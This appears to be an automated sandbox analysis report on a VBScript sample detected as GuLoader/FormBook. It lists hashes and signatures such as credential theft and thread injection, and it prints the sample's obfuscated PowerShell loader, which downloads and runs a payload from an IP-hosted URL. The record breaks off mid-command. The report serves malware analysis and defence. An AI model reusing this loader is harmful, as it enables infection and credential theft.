Edit tour
Windows
Analysis Report
Pedido02304024.vbs
Overview
General Information
| Sample name: | Pedido02304024.vbs |
| Analysis ID: | 1430738 |
| MD5: | 01fcc44530ca64a9bd6ea11bdd55f48a |
| SHA1: | 8114d39d9c4691782f60affe1116dabc2cd52a96 |
| SHA256: | fbf530e626999d7d6b6756f91ced542d15801f98c4e1caffcaccdabdec281d83 |
| Tags: | vbs |
| Infos: |   |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7424 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Pedid o02304024. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7556 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Kildemat erialet107 = 1;$Kern evaabnet=' Substrin'; $Kernevaab net+='g';F unction ci ceroner($B ldgringer) {$Cholecys togram=$Bl dgringer.L ength-$Kil dematerial et107;For( $Brandsitu ationerne= 1; $Brands ituationer ne -lt $Ch olecystogr am; $Brand situatione rne+=(2)){ $Categoric alness+=$B ldgringer. $Kernevaab net.Invoke ($Brandsit uationerne , $Kildema terialet10 7);}$Categ oricalness ;}function Nonsensit izeds($wha p){& ($Skimpine ss) ($whap );}$Autoin dtrks=cice roner 'PM, o z i l lO aK/,5K. 0 ( W.iAnRd oUw sC NE TC ,1S0.. 0M;I W i n u6 4.;W Px S6R4 ;, rR vK: 1 2B1A . 0 )S cG. egcKk oA/ 2E0R1S0 0l 1 0Y1T .FT iOr,e,f o. xP/n1s2U1G .,0B ';$Hy psilophodo ntoid21=ci ceroner 'K U.s ePr - A g e,nPt ';$Lydside rnes=cicer oner 'Uh t OtMp,:./ / L8B7 . 1 2 1w..1 0.5 R.g1 6U3 / .BFo,lPd,k ClUuSbHbSe Cn s,. p c KzN ';$jvn hjde=cicer oner ',>, ';$Skimpin ess=cicero ner 'AiJeU x, ';$equi changeable ='Jynginae ';Nonsensi tizeds (ci ceroner '. S,eRt -BC oMn,tPe nP tM -ZPSa t Nh WT :E\S FTeGi ..t xCtU G-,V all,u,eR $ AeSq uIipc ,hFa nPg e Ba b l.e ; M ');Nonse nsitizeds (ciceroner ',i.f. E( BtKeKs tE- p a t h TB: \AFAe i..stGxTt ),{ eUxIiM t }W; ');$ Nutmegged = cicerone r 'QeBc.hS oU %taOp p dSast aT% ,\AcbeJi,l .oamEe.t e Ir s,.BPBr AiU H&,&. eDc,hDoB $ . ';Nonsen sitizeds ( ciceroner ' $ gSlRo bTa l.:,C oTnNv eSt h.=K(.c mD dT a/ac $ RN uFt.mMe g,gPeFdL) P ');Nonse nsitizeds (ciceroner 'F$OgKl o b aAlS:TL itn i e s Fk r.i vUe VrAsr=F$NL ByDdSs i d ,eTrInReSs ,.Ns.p lLi t ( $Hj.v n hFjLd,e ,). ');$Ly dsidernes= $Linieskri vers[0];No nsensitize ds (cicero ner 'T$Og lEo b aUlr : RAe fSe. r eLn c e. v rTkDe rw =PNCe w - O b j.ePcS tU .ShyPsP t eNmD. N e.tG.JWEe bFC.lTi e, n t. ');No nsensitize ds (cicero ner 'U$UR. eKfAe rDe, nsc e,v r. kIe rG.VH e aPd eDr, sO[R$MHRyV pFs iLlAo. pFhIo dGo, n tDo.iIdu 2,1O].=.$U A uFt oUi n,d t r.k sL ');$Sup errheumati zed=cicero ner 'LR.eH fSeFr e,n cte.vBrVkO eVr .IDKo w nPl oNa d F i l.ec ( $.LIy,d. sBiIdBeSrS n.e.sD, $. BAe,tTa g. eBtSh,e.dI sG), ';$Su perrheumat ized=$Conv eth[1]+$Su perrheumat ized;$Beta getheds=$C onveth[0]; Nonsensiti zeds (cice roner ' $A gFl o,bBa. l.:MDTvHnK l d.eEnC=I (UTFe s,tR - PMa.t.h $TBPe tSa MgMe tNhKe d s ) '); while (!$D vnlden) {N onsensitiz eds (cicer oner '.$Pg FlToSb aPl S: OSdTiKn Si aNn = $ .t r u.eO ') ;Nonsen sitizeds $ Superrheum atized;Non sensitized s (ciceron er ' SWtBa .r.t -TS l .e e pS E4 . ');Nonse nsitizeds (ciceroner 'B$ g lEo .bCaWl,:,D vBnBlPdBe In = (RTUe ,s,tR- P.a St ha B$,B se t aAg e ,tDh e.dDs P) ') ;Non sensitized s (ciceron er 'D$ gMl Qo b,aCln: